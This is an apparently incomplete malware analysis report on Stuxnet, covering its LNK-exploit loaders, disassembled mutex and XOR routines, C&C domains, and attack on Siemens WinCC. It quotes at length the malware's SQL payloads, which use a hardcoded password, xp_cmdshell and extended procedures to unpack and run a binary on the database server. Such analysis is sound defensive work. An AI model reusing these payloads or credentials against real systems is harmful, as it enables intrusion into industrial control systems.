
STUXNET MALWARE PACKAGE

Components Tree
.LNK files
~WTRxxxx.tmp dlls
Extracted/decompressed dll
MRXxxx.sys drivers
2 Embedded Wrapper.dll
Embedded .exe template
Embedded .lnk template
Embedded ~WTR4141.tmp
Embedded .cab file
Another .dll
Two .dat files

Components Breakdown
Copy of Shortcut
to.lnk
Copy of Copy of Shortcut
to.lnk
Copy of Copy of Copy of
Shortcut to.lnk
Copy of Copy of Copy of Copy of
Shortcut to.lnk

~WTR4141.tmp

CVE-2010-2568: LNK/PIF files


Automatic Execution
Vulnerability
Launches ~WTR4141.tmp
within the Windows Shell
process
DLL ~26 KB Initial loader
Hook user-mode File APIs to
hide files from the Windows
Shell process
Hook user-mode Section APIs
to allow loading a dll from a
non-existent file (perhaps to
mask the dll name?), or from
memory
Loads ~WTR4132.tmp using
custom dll loading, then calls

~WTR4132.tmp

DLL ~506 KB second phase


loader
Shares code bases with
~WTR4141
UPX unpacks embedded data
into memory
Hook user mode Section APIs
(as above)
Load unpacked data as a DLL
from memory, then call an
exported function

Embedded UPX dll from ~WTR4132.tmp


Referred to as Stuxnet.dll in this report

DLL ~1250 KB
This is the main Trojan
Many exported functions
Many embedded resources
Many capabilities
This is what we will focus on

Stuxnet timeline
1/1/2009 10:50:28AM Stuxnet Generic PE Template
Timestamp
1/1/2009 10:53:25AM MRxcls.sys Timestamp

1/13/2010 2:00:53AM lsass inject template


Timestamp
1/25/2010 6:39:24AM MRxnet.sys Timestamp
2/3/2010 4:15:29AM UTC ~WTR4141.tmp signed
2/28/2010 9:54:43PM Stuxnet primary Trojan
Timestamp

6/??/2010: Stuxnet detected


6/12/2010: RealTek certificate used by Stuxnet
drivers expired
7/16/2010: RealTek certificate revoked
7/19/2010: Stuxnet variant with drivers signed by JMicron
detected
7/20/2010: JMicron certificate revoked

USB, Network Share, WebDav, or certain file types that
support embedding links
Infected drives/shares/files contain the following:
Shortcut files used to gain execution:
Copy of Shortcut to.lnk
Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Copy of Shortcut to.lnk

Actual Trojan binaries (dlls):


~WTR4141.tmp ~26KB
~WTR4132.tmp ~506KB

~WTR4141.tmp
CreateMutex name format {%08x-%08x-%08x-%08x}; each of the four fields is the current process ID
XORed with a different constant (two sets of constants are used, shown below)
// Formats the string the report identifies as a mutex name: the current process ID
// is XORed with four fixed constants and the results fill the four %08x fields.
// Because the process ID is an input, the name differs per process and cannot be
// matched as one fixed string; it can be recomputed from a process ID and the
// constants below.
100020A7
call dword ptr [0x10005048] // __imp_KERNEL32.dll!
GetCurrentProcessId[0000588A]
// eax now holds the current process ID (pid)
100020AD loc_100020AD:
100020AD
mov ecx,eax
100020AF
xor ecx,0x00049481
100020B5
// pushed first, so pid ^ 0x00049481 is the last wsprintfW argument (fourth %08x field)
push ecx
100020B6
mov edx,eax
100020B8
xor edx,0x05858721
100020BE
// third %08x field: pid ^ 0x05858721
push edx
100020BF
mov ecx,eax
100020C1
xor ecx,0x0AE48481
100020C7
// second %08x field: pid ^ 0x0AE48481
push ecx
100020C8
xor eax,0x05858AA3
100020CD
// first %08x field: pid ^ 0x05858AA3
push eax
100020CE
// address of a stack location, passed below as wsprintfW's output buffer
lea edx,[esp+0x14]
100020D2
push 0x100054F8 // {%08x-%08x-%08x-%08x}
100020D7
push edx
100020D8
call dword ptr [0x100050D8] // __imp_USER32.dll!
wsprintfW[00005AD2]
// Second instance of the same formatting sequence with a different set of XOR
// constants: the current process ID is XORed with four fixed values and the
// results fill the four %08x fields of the same format string (0x100054F8).
10002137
call dword ptr [0x10005048] // __imp_KERNEL32.dll!
GetCurrentProcessId[0000588A]
// eax now holds the current process ID (pid)
1000213D loc_1000213D:
1000213D
mov ecx,eax
1000213F
xor ecx,0x04393481
10002145
// pushed first, so pid ^ 0x04393481 is the last wsprintfW argument (fourth %08x field)
push ecx
10002146
mov edx,eax
10002148
xor edx,0x05800097
1000214E
// third %08x field: pid ^ 0x05800097
push edx
1000214F
mov ecx,eax
10002151
xor ecx,0x00040941
10002157
// second %08x field: pid ^ 0x00040941
push ecx
10002158
xor eax,0x09487481
1000215D
// first %08x field: pid ^ 0x09487481
push eax
1000215E
// address of a stack location, passed below as wsprintfW's output buffer
lea edx,[esp+0x14]
10002162
push 0x100054F8 // {%08x-%08x-%08x-%08x}
10002167
push edx
10002168
call dword ptr [0x100050D8] // __imp_USER32.dll!
wsprintfW[00005AD2]

CreateMutex: {BE3533AB-2DDC-46a1-8F7B-F102B8A5C30A}

Generates a name of the form SHELL32.DLL.ASLR.%08x, where the hex suffix is computed from two GetTickCount() calls


// Builds the string "SHELL32.DLL.ASLR." followed by an 8-digit hex value.
// The value is (second GetTickCount() * 7) + (first GetTickCount() / 7), so it
// is time-dependent and differs between runs; only the fixed prefix is stable.
10002019
mov esi,dword ptr [0x1000508C] // __imp_KERNEL32.dll!
GetTickCount[00005998]
1000201F
// first GetTickCount() call; result in eax
call esi
10002021 loc_10002021:
10002021
mov ecx,eax
10002023
// 0x24924925 is the reciprocal constant compilers emit for unsigned division by 7
mov eax,0x24924925
10002028
// edx = high 32 bits of tick * 0x24924925
mul ecx
1000202A
sub ecx,edx
1000202C
shr ecx,1
1000202E
add ecx,edx
10002030
// after this shift ecx = first tick count / 7
shr ecx,0x2
10002033
// keep the quotient across the second call
mov edi,ecx
10002035
// second GetTickCount() call; result in eax
call esi
10002037 loc_10002037:
10002037
// ecx = eax * 8
lea ecx,[0x00000000+eax*8]
1000203E
// ecx = eax * 7
sub ecx,eax
10002040
// ecx = second tick * 7 + first tick / 7
add ecx,edi
10002042
// pushed first, so this is the last wsprintfW argument (the %08x value)
push ecx
10002043
push 0x100054C4 // SHELL32.DLL.ASLR.
10002048
// address of a stack location, passed below as wsprintfW's output buffer
lea edx,[esp+0x1C]
1000204C
push 0x100054E8 // %s%08x
10002051
push edx
10002052
call dword ptr [0x100050D8] // __imp_USER32.dll!
wsprintfW[00005AD2]
It also attempts to manipulate Total Commander by posting a key-down, key-up
sequence for 0x74 (t). Note that 0x74 is ASCII 't', but as a Windows virtual-key code 0x74 is VK_F5.
Hooks some low level ntdll calls to provide LoadDLLtoMemory functionality (see
section below):
ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwClose
ZwQueryAttributesFile
ZwQuerySection
Loads ~WTR4132.tmp into memory

SIMPLE XOR DECODING ROUTINES


Strings are encoded with a simple single-byte XOR using the key 0x12:
100036C1 loc_100036C1:
100036C1
mov dl,byte ptr [eax]
100036C3
xor dl,0x12
100036C6
mov byte ptr [ecx],dl
100036C8
jne 0x100036BE // loc_100036BE
100036CA loc_100036CA:
or with a 16-bit XOR using the key 0xAE12:
100036F1
100036F1
100036F2
100036F2
100036F3
100036F4
100036F7
100036F8
100036F9
100036FE
10003701
10003704
10003706
10003706
10003707
10003707

loc_100036F1:
push edi
loc_100036F2:
inc ecx
inc ecx
mov ax,word ptr [ecx]
inc edx
inc edx
mov edi,0xAE12
xor ax,di
mov word ptr [edx],ax
jne 0x100036F2 // loc_100036F2
loc_10003706:
pop edi
loc_10003707:
ret

NTDLL Hooking to custom load DLLs from memory or to


hide DLL name
Hooks some low level ntdll calls to provide LoadDLLtoMemory functionality:
ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwClose
ZwQueryAttributesFile
ZwQuerySection
TODO: Add detail

~WTR4132.TMP
A large DLL, custom-loaded by the first ~WTR .tmp file (~WTR4141.tmp). It mostly consists of a
UPX-packed DLL, and it uses special loading methods very similar to those of ~WTR4141.tmp to
extract that DLL and load it in memory.

STUXNET.DLL

COMMAND AND CONTROL


The Stuxnet.dll contains code to validate internet connectivity using the following
domains (obtained with a recon trace):
ECX: 0x00FDF7B8 Unicode: www.windowsupdate.com
ECX: 0x00FDF838 Unicode: www.msn.com
However, these domains are not actually contacted; the C&C code goes straight to
attempting HTTP connections to the following domains (obtained with a recon trace; the last string is a request path, not a domain):
ECX: 0x00FDF8B8 Unicode: www.mypremierfutbol.com
ECX: 0x00FDF9B8 Unicode: www.todaysfutbol.com
ECX: 0x00FDF938 Unicode: index.php?data
TODO: Finish details

Siemens Step 7 / WinCC


The Stuxnet.dll contains code to access the Siemens Step 7 industrial automation
system. It uses a hardcoded user ID and password
(uid=WinCCConnect;pwd=2WSXcder) to connect to the database server and
execute SQL commands that dump database tables to disk and possibly inject and execute a
binary on the database server. The SQL strings involved are listed below.
view MCPVPROJECT2 as select MCPTPROJECT.PROJECTID,
MCPTPROJECT.PROJECTNAME, MCPTPROJECT.PROJECTVERSION,
MCPTPROJECT.PROJECTMODE, MCPTPROJECT.PROJECTCREATOR,
MCPTPROJECT.PROJECTEDITOR, MCPTPROJECT.CREATIONDATE,
MCPTPROJECT.EDITDATE, MCPTPROJECT.PRJCOMMENT,
MCPTPROJECT.CSLANGUAGE, MCPTPROJECT.RTLANGUAGE,
MCPTPROJECT.PROJECTGUID, MCPTPROJECT.PRJTABLETYPES,
MCPTPROJECT.PRJDATATYPES, MCPTPROJECT.PRJCREATEVERMAJ,
MCPTPROJECT.PRJCREATEVERMIN, MCPTPROJECT.PRJXRES,
MCPTPROJECT.PRJTIMEMODE, MCPTPROJECT.PRJDELTAMODE,
MCPTPROJECT.PRJDELTAREMOTE from MCPTPROJECT
view MCPVPROJECT2 as select
MCPTPROJECT.PROJECTID,MCPTPROJECT.PROJECTNAME,MCPTPROJECT.PROJECTVERSI
ON,MCPTPROJECT.PROJECTMODE,MCPTPROJECT.PROJECTCREATOR,MCPTPROJECT.PR
OJECTEDITOR,MCPTPROJECT.CREATIONDATE,MCPTPROJECT.EDITDATE,MCPTPROJECT.
PRJCOMMENT,MCPTPROJECT.CSLANGUAGE,MCPTPROJECT.RTLANGUAGE,MCPTPROJE
CT.PROJECTGUID,MCPTPROJECT.PRJTABLETYPES,MCPTPROJECT.PRJDATATYPES,MCPTP
ROJECT.PRJCREATEVERMAJ,MCPTPROJECT.PRJCREATEVERMIN,MCPTPROJECT.PRJXRES,
MCPTPROJECT.PRJTIMEMODE,MCPTPROJECT.PRJDELTAMODE,MCPTPROJECT.PRJDELTA
REMOTE from MCPTPROJECT
view MCPVPROJECT2 as select
PROJECTID,PROJECTNAME,PROJECTVERSION,PROJECTMODE,PROJECTCREATOR,PROJE
CTEDITOR,CREATIONDATE,EDITDATE,PRJCOMMENT,CSLANGUAGE,RTLANGUAGE,PROJ
ECTGUID,PRJTABLETYPES,PRJDATATYPES,PRJCREATEVERMAJ,PRJCREATEVERMIN,PRJX
RES,PRJTIMEMODE,PRJDELTAMODE,PRJDELTAREMOTE from MCPTPROJECT where
((SELECT top 1 1 FROM MCPVREADVARPERCON)='1')
view MCPVREADVARPERCON as
select MCPTVARIABLEDESC.VARIABLEID,
MCPTVARIABLEDESC.VARIABLETYPEID,
MCPTVARIABLEDESC.FORMATFITTING,
MCPTVARIABLEDESC.SCALEID,
MCPTVARIABLEDESC.VARIABLENAME,
MCPTVARIABLEDESC.ADDRESSPARAMETER,
MCPTVARIABLEDESC.PROTOKOLL,
MCPTVARIABLEDESC.MAXLIMIT,
MCPTVARIABLEDESC.MINLIMIT,
MCPTVARIABLEDESC.STARTVALUE,
MCPTVARIABLEDESC.SUBSTVALUE,
MCPTVARIABLEDESC.VARFLAGS,
MCPTVARIABLEDESC.CONNECTIONID,
MCPTVARIABLEDESC.VARPROPERTY,
MCPTVARIABLEDESC.CYCLETIMEID,
MCPTVARIABLEDESC.LASTCHANGE,
MCPTVARIABLEDESC.ASDATASIZE,

MCPTVARIABLEDESC.OSDATASIZE,
MCPTVARIABLEDESC.VARGROUPID,
MCPTVARIABLEDESC.VARXRES,
MCPTVARIABLEDESC.VARMARK,
MCPTVARIABLEDESC.SCALETYPE,
MCPTVARIABLEDESC.SCALEPARAM1,
MCPTVARIABLEDESC.SCALEPARAM2,
MCPTVARIABLEDESC.SCALEPARAM3,
MCPTVARIABLEDESC.SCALEPARAM4
from MCPTVARIABLEDESC
view MCPVREADVARPERCON as
select MCPTVARIABLEDESC.VARIABLEID,
MCPTVARIABLEDESC.VARIABLETYPEID, MCPTVARIABLEDESC.FORMATFITTING,
MCPTVARIABLEDESC.SCALEID,
MCPTVARIABLEDESC.VARIABLENAME,
MCPTVARIABLEDESC.ADDRESSPARAMETER, MCPTVARIABLEDESC.PROTOKOLL,
MCPTVARIABLEDESC.MAXLIMIT,
MCPTVARIABLEDESC.MINLIMIT,
MCPTVARIABLEDESC.STARTVALUE, MCPTVARIABLEDESC.SUBSTVALUE,
MCPTVARIABLEDESC.VARFLAGS,
MCPTVARIABLEDESC.CONNECTIONID,
MCPTVARIABLEDESC.VARPROPERTY, MCPTVARIABLEDESC.CYCLETIMEID,
MCPTVARIABLEDESC.LASTCHANGE, MCPTVARIABLEDESC.ASDATASIZE,
MCPTVARIABLEDESC.OSDATASIZE, MCPTVARIABLEDESC.VARGROUPID,
MCPTVARIABLEDESC.VARXRES, MCPTVARIABLEDESC.VARMARK,
MCPTVARIABLEDESC.SCALETYPE,
MCPTVARIABLEDESC.SCALEPARAM1,
MCPTVARIABLEDESC.SCALEPARAM2,
MCPTVARIABLEDESC.SCALEPARAM3,
MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC
view MCPVREADVARPERCON as select
MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIA
BLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIA
BLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKO
LL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDES
C.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,M
CPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIA
BLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASD
ATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPT
VARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCAL
ETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCP
TVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from
MCPTVARIABLEDESC
view MCPVREADVARPERCON as select
VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPA
RAMETER,PROTOKOLL,MAXLIMIT,MINLIMIT,STARTVALUE,SUBSTVALUE,VARFLAGS,CO
NNECTIONID,VARPROPERTY,CYCLETIMEID,LASTCHANGE,ASDATASIZE,OSDATASIZE,VA
RGROUPID,VARXRES,VARMARK,SCALETYPE,SCALEPARAM1,SCALEPARAM2,SCALEPAR
AM3,SCALEPARAM4 from
MCPTVARIABLEDESC,openrowset('SQLOLEDB','Server=.\WinCC;uid=WinCCConnect;
pwd=2WSXcder','select 0;declare @t varchar(999),@s varchar(999),@a int declare r
cursor for select filename from master..sysdatabases where (name like ''CC%'')
open r fetch next from r into @t while (@@fetch_status<>-1) begin set
@t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec
master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell
''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t=@t+''x'';dbcc
addextendedproc(sp_run,@t);exec master..sp_run;exec

master..sp_dropextendedproc sp_run;break;end fetch next from r into @t end close r


deallocate r')
view MCPVREADVARPERCON as select
VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPA
RAMETER,PROTOKOLL,MAXLIMIT,MINLIMIT,STARTVALUE,SUBSTVALUE,VARFLAGS,CO
NNECTIONID,VARPROPERTY,CYCLETIMEID,LASTCHANGE,ASDATASIZE,OSDATASIZE,VA
RGROUPID,VARXRES,VARMARK,SCALETYPE,SCALEPARAM1,SCALEPARAM2,SCALEPAR
AM3,SCALEPARAM4 from
MCPTVARIABLEDESC,openrowset('SQLOLEDB','Server=.\WinCC;uid=WinCCConnect;
pwd=2WSXcder','select 0;use master;declare @t varchar(999),@s
varchar(999);select @t=filename from master..sysdatabases where (name like ''CC
%'');set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';set
@s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t
= @t+''x'';dbcc addextendedproc(sprun,@t);exec master..sprun;exec
master..sp_dropextendedproc sprun')
view MCPVREADVARPERCON as select
VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPA
RAMETER,PROTOKOLL,MAXLIMIT,MINLIMIT,STARTVALUE,SUBSTVALUE,VARFLAGS,CO
NNECTIONID,VARPROPERTY,CYCLETIMEID,LASTCHANGE,ASDATASIZE,OSDATASIZE,VA
RGROUPID,VARXRES,VARMARK,SCALETYPE,SCALEPARAM1,SCALEPARAM2,SCALEPAR
AM3,SCALEPARAM4 from
MCPTVARIABLEDESC,openrowset('SQLOLEDB','Server=.\WinCC;uid=WinCCConnect;
pwd=2WSXcder','select 0;use master;declare @t varchar(999),@s
varchar(999);select @t=filename from master..sysdatabases where (name like ''CC
%R'');set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';set
@s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t
= @t+''x'';dbcc addextendedproc(sp_run,@t);exec master..sp_run;')
EXEC sp_dropextendedproc sp_dumpdbilog
((SELECT top 1 1 FROM MCPVREADVARPERCON)='1') --CC-SP
0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''use
[?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''--CCS''''+char(80);if left(db_name(),2)=''''CC'''' select
@t=substring(text,charindex(@s,text)+8,charindex(''''--*'''',text)charindex(@s,text)-8) from syscomments where text like (''''%''''+@s+''''%'''');if @t
is not NULL exec(@t)'';exec sp_msforeachdb @z')
CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x
DECLARE @ashl int,
@aind varchar(260),
@ainf varchar(260),
@hr
int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq
EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings',
@aind OUT, '%
%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' EXEC
sp_addextendedproc sp_dumpdbilog, @ainf EXEC sp_dumpdbilog EXEC
sp_dropextendedproc sp_dumpdbilog endq:

DECLARE @ashl int,


@aind varchar(260),
@ainf varchar(260),
@hr
int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq
EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings',
@aind OUT, '%
%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @aods int,
@adss int,
@aip int,
@abf varbinary(4096) EXEC @hr
= sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr =
sp_OASetProperty @aods, 'Type', 1 IF @hr <> 0 GOTO endq EXEC @hr =
sp_OAMethod @aods, 'Open', null IF @hr <> 0 GOTO endq SET @adss = ( SELECT
DATALENGTH(abin) FROM sysbinlog ) SET @aip = 1 WHILE ( @aip <= @adss )
BEGIN SET @abf = ( SELECT SUBSTRING (abin, @aip, 4096 ) FROM sysbinlog )
EXEC @hr = sp_OAMethod @aods, 'Write', null, @abf IF @hr <> 0 GOTO endq SET
@aip = @aip + 4096 END EXEC @hr = sp_OAMethod @aods, 'SaveToFile', null,
@ainf, 2 IF @hr <> 0 GOTO endq EXEC sp_OAMethod @aods, 'Close', null endq:
DECLARE @ashl int,
@aind varchar(260),
@ainf varchar(260),
@hr
int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq
EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings',
@aind OUT, '%
%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @fs int
EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fs OUT IF @hr <> 0 GOTO
endq EXECUTE sp_OAMethod @fs, 'DeleteFile', NULL, @ainf endq:
DECLARE @vr varchar(256) SET @vr = CONVERT(varchar(256), (SELECT
serverproperty('productversion') )) IF @vr > '9' BEGIN
EXEC sp_configure 'show
advanced options', 1 RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'Ole
Automation Procedures', 1
RECONFIGURE WITH OVERRIDE END
DROP TABLE sysbinlog
declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments
where id=object_id(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from
dbo.syscomments c, dbo.sysobjects o
where o.id = c.id and c.id =
object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set
@e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if
@f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from
fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM
MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s
varchar(999),@a int declare r cursor for select filename from master..sysdatabases
where (name like ''CC%'') open r fetch next from r into @t while
(@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))
+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s =
''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t =
@t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec
master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end
close r deallocate r --*' exec (@t)
declare @t varchar(4000), @e int, @f int if exists (select text from
dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]')) select
@t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id
= object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t)
if @e=0 set @t=right(@t,len(@t)-7) else begin set

@f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set


@t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set
@t='alter
'+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXc
der'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set
@z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CCS''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select
@t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)charindex(@s,text)-8) from syscomments where text like
(''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';exec sp_msforeachdb
@z'')' exec (@t)
exec master..sp_attach_db 'wincc_svr',N'%s',N'%s'
exec master..sp_detach_db 'wincc_svr'
Provider='%s';Data Source=%s;Initial Catalog='%s';User
ID='%s';Password='%s';Connection Timeout=%i;
select name from master..sysdatabases where filename like N'%s'
use [%s]
use master
use wincc_svr
